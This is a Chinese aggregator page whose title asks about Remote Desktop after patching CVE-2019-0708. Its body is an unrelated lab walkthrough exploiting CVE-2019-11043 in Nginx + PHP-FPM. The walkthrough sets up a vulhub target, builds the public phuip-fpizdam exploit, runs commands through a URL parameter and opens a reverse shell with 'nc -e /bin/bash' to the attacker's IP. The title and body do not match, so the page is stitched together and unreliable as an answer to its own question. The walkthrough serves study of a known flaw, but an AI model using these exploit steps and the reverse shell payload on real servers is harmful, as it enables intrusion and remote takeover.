当前位置:首页 > 每日看点 > 正文内容

求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?

卡卷网1年前 (2024-11-30)每日看点254

漏洞描述

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。

向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。

该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下:

location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }

攻击者可以使用换行符(%0a)来破坏 fastcgi_split_path_info 指令中的Regexp。 Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。

影响范围

在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:

PHP 7.0 版本 PHP 7.1 版本 PHP 7.2 版本 PHP 7.3 版本

漏洞复现

使用 p 牛的 docker 环境进行复现:

PHP-FPM 远程代码执行漏洞(CVE-2019-11043)

准备工作:安装docker、golang环境

sudo apt-get install docker docker-compose sudo apt install golang

攻击机:kali-linux-2022.4(192.168.81.162)

靶机:kali-linux-2022.4(192.168.81.150)

1.在靶机上搭建漏洞环境

git clone https://github.com/vulhub/vulhub.git


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第1张


cd vulhub/php/CVE-2019-11043 docker-compose up -d


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第2张


2.启动环境后,访问 靶机ip:8080/index.php ,就可以看到漏洞环境的默认页面。


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第3张


3.安装漏洞利用工具

git clone https://github.com/neex/phuip-fpizdam.git cd phuip-fpizdam go get -v && go build


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第4张


4.漏洞利用


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第5张


5.访问 index.php?a=id

注意:只有部分PHP-FPM子进程受到了污染,因此请尝试几次以执行该命令。


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第6张



求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第7张


反弹shell

在环境中安装 nc


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第8张



求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第9张


攻击机开启监听

nc -lvp 9999


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第10张


输入payload

?a=nc -e /bin/bash 192.168.81.162 9999

反弹shell成功


求教 CVE-2019-0708远程桌面服务远程执行代码漏洞安装补丁后还可以远程桌面吗?  第11张


参考链接

blog.leanote.com/post/s

扫描二维码推送至手机访问。

版权声明:本文由卡卷网发布,如需转载请注明出处。

本文链接:https://www.kajuan.net/ttnews/2024/11/2257.html

分享给朋友:

相关文章

最让你震惊的网站有哪些?

压箱底的震惊来了,来波大的,一百个网站!这些都是我平时辛辛苦苦收集的,是真的牛逼,居然还有这种网站。1、实时地球网址:https://zoom.earth/实时图像每 10 分钟更新一次,提供风暴、天气预报、降水、火警等数据2、陕西博物馆...

为什么我感受不到 1500 元的手机比四五千的差?

我长期使用两千元左右的安卓机,一天接近8小时的重度手机使用者。某天我突然想试试看传说中非常赛艇的苹果。狠了心,砸了钱。七千大样买了爱疯。就这?什么辣鸡玩意。而且因为我一直更新软件,用了两年爱疯就卡了。并没有传说中的用四五年不卡。用了这么一次...

为什么说不懂电脑的不要碰AMD?

作为一个资深垃圾佬,说缺点前,先说优点吧AMD CPU(后续简称AU)的优点:处理器对比Intel,三级缓存更大,最明显的感知就是,网游帧数更高(5900X,7900X之类高端型号都是双CCX共享大缓存,反而不如次一点的CPU帧数更高);相...

都是前端框架,为什么用 React 的人会有优越感?

都是前端框架,为什么用 React 的人会有优越感?

上家公司一直搞react,最近第一次写个vue3项目。老板朋友来了看了下页面说:这用vue写的吧。我:是...老板朋友:一看就知道是vue做的。这tm你看一眼页面就知道用的啥框架?这感觉就是,我一直用苹果,偶尔用了下华为打电话,有个人离老远...

夸克浏览器受欢迎的原因是什么?

夸克浏览器受欢迎的原因是什么?

这是可以说的嘛~哈哈,它比较吸引我的几点是:安全无广、页面简洁、功能丰富、反应速度快......首页页面支持自定义,喜欢什么样子都可以自己调整,没有花里胡哨的各种资讯推送,热搜日报整理归纳好,想看再点开查看,看着舒适度直接拉满!实用日常工具...

无意中发现技术主管写的代码,大家帮忙看看什么水平?

无意中发现技术主管写的代码,大家帮忙看看什么水平?

虽然很多答主用了诸如“典范级”、“心旷神怡” 的形容, 赞美这段代码, 但这里, 出于技术讨论的动机, 我说说不同看法.栈, 如果善于利用栈来处理树结构, 那么可以写出更简洁的代码, 根本不需要 recuresiveFn 这种方法. 泛型,...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。